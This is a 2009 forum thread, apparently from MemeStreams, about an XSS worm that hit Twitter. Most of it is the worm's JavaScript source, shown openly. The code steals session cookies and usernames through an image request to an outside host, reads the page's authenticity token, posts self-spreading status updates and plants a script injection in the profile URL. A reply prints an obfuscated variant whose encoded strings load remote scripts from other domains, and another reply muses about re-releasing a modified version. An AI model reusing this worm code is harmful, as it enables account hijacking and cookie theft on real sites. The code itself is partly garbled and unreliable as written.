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This page contains all of the posts and discussion on MemeStreams referencing the following web page: Another Ajax powered XSS worm. You can find discussions on MemeStreams as you surf the web, even if you aren't a MemeStreams member, using the Threads Bookmarklet.

Another Ajax powered XSS worm
by Acidus at 10:06 pm EDT, Apr 12, 2009

An XSS/Ajax worm hit Twitter. But its cool, because Ajax doesn't help amplify XSS attacks right? oh, wait, maybe it does. ;-)

Update: Source

function XHConn()
  var xmlhttp, bComplete = false;
  try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
  catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
  catch (e) { try { xmlhttp = new XMLHttpRequest(); }
  catch (e) { xmlhttp = false; }}}
  if (!xmlhttp) return null;
  this.connect = function(sURL, sMethod, sVars, fnDone)
    if (!xmlhttp) return false;
    bComplete = false;
    sMethod = sMethod.toUpperCase();
    try {
      if (sMethod == "GET")
      {, sURL+"?"+sVars, true);
        sVars = "";
      {, sURL, true);
        xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1");
      xmlhttp.onreadystatechange = function(){
        if (xmlhttp.readyState == 4 && !bComplete)
          bComplete = true;
    catch(z) { return false; }
    return true;
  return this;
function urlencode( str ) {
    var histogram = {}, tmp_arr = [];
    var ret = str.toString();
    var replacer = function(search, replace, str) {
        var tmp_arr = [];
        tmp_arr = str.split(search);
        return tmp_arr.join(replace);
    histogram["'"] = '%27';
    histogram['('] = '%28';
    histogram[')'] = '%29';
    histogram['*'] = '%2A';
    histogram['~'] = '%7E';
    histogram['!'] = '%21';
    histogram['%20'] = '+';
    ret = encodeURIComponent(ret);
    for (search in histogram) {
        replace = histogram[search];
        ret = replacer(search, replace, ret)
    return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
        return "%"+m2.toUpperCase();
    return ret;
var content = document.documentElement.innerHTML;
userreg = new RegExp(/<meta content="(.*)" name="session-user-screen_name"/g);
var username = userreg.exec(content);
username = username[1];
var cookie;
cookie = urlencode(document.cookie);
document.write("<img src='" + cookie + "&username=" + username + "'>");
document.write("<img src=''>");
function wait()
  var content = document.documentElement.innerHTML;
  authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
  var authtoken = authreg.exec(content);
  authtoken = authtoken[1];
  var randomUpdate=new Array();
  randomUpdate[0]="Dude, is awesome. What's the fuss?";
  randomUpdate[1]="Join everyone!";
  randomUpdate[2]="Woooo, :)";
  randomUpdate[3]="Virus!? What? is legit!";
  var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];
  updateEncode = urlencode(genRand);
  var xss = urlencode('"></a><script src=""></script><a ');
  var ajaxConn = new XHConn();
  ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update");
  var ajaxConn1 = new XHConn();
  ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");

RE: Another Ajax powered XSS worm
by Rattle at 1:51 pm EDT, Apr 13, 2009

Acidus wrote:
An XSS/Ajax worm hit Twitter. But its cool, because Ajax doesn't help amplify XSS attacks right? oh, wait, it does.

This is so fucking lame:

var randomUpdate=new Array();
randomUpdate[0]="Dude, is awesome. What's the fuss?";
randomUpdate[1]="Join everyone!";
randomUpdate[2]="Woooo, :)";
randomUpdate[3]="Virus!? What? is legit!";

The evil side of me thinks it would be fun to patch the virus to something like this and re-release it:

var randomUpdate=new Array();
randomUpdate[0]="Dude, I don't see any of these killer robots you are tweating about. What's the fuss?";
randomUpdate[1]="Join the fight against the killer robots everyone!";
randomUpdate[2]="Woooo, we've finally got killer robots!  Soon maybe flying cars finally :)";
randomUpdate[3]="Virus!? What? This isn't a bunch of infected vacuum cleaners we are talking about here..  THESE ARE KILLER ROBOTS FROM OUTER SPACE!";
randomUpdate[4]="Wow...I just watched a killer robot eat my mailman..";
randomUpdate[5]="@twitter It's all your fault, the killer robots use twitter to communicate!";

RE: Another Ajax powered XSS worm
by Worthersee at 3:01 pm EDT, Apr 13, 2009

Cute obfuscation

var _0xc26a = ["Msxml2.XMLHTTP", "Microsoft.XMLHTTP", "connect", "toUpperCase", "GET", "?", "open", "", "Method", "POST ", " HTTP/1.1", "setRequestHeader", "Content-Type", "application/x-www-form-urlencoded", "onreadystatechange", "readyState", "send", "split", "join", "'", "%27", "(", "%28", ")", "%29", "*", "%2A", "~", "%7E", "!", "%21", "%20", "+", "%", "replace", "innerHTML", "documentElement", "exec", "Twitter should really fix this... Mikeyy", "I am done... Mikeyy", "Mikeyy is done..", "Twitter please fix this, regards Mikeyy", "random", "length", "floor", "mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%6a%73%78%73%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%78%73%73%6a%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%62%61%6d%62%61%6d%79%6f%2e%31%31%30%6d%62%2e%63%6f%6d%2f%77%6f%6d%70%77%6f%6d%70%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "/status/update", "POST", "authenticity_token=", "&status=", "&return_rendered_status=true&twttr=true", "/account/settings", "&user[name]=Womp+++++++++++++++++++++++++++++++++++++++++!&user[url]=", "&tab=home&update=update", "/account/profile_settings", "&user[profile_default]=false&tab=none&profile_theme=0&user[profile_use_background_image]=0&user[profile_background_tile]=0&user[profile_link_color]=", "&commit=save+changes", "wait()""];
function XHConn(){
  var _0x6687x2,_0x6687x3=false;
  try{ _0x6687x2= new ActiveXObject(_0xc26a[0x0]); }
  catch(e) { try{ _0x6687x2= new ActiveXObject(_0xc26a[0x1]); }
  catch(e) { try { _0x6687x2= new XMLHttpRequest(); }
  catch(e) { _0x6687x2=false; }; }; };
  if (!_0x6687x2) { return null; } ;
  this[_0xc26a[0x2]]=function (_0x6687x4,_0x6687x5,_0x6687x6,_0x6687x7) {
    if (!_0x6687x2) { return false; };
    try {
      if(_0x6687x5==_0xc26a[0x4]) {
      } else {
      } ;
      _0x6687x2[_0xc26a[0xe]]=function () {
        if (_0x6687x2[_0xc26a[0xf]]==0x4&&!_0x6687x3) {
        } ;
  ... [ Read More (0.4k in body) ]

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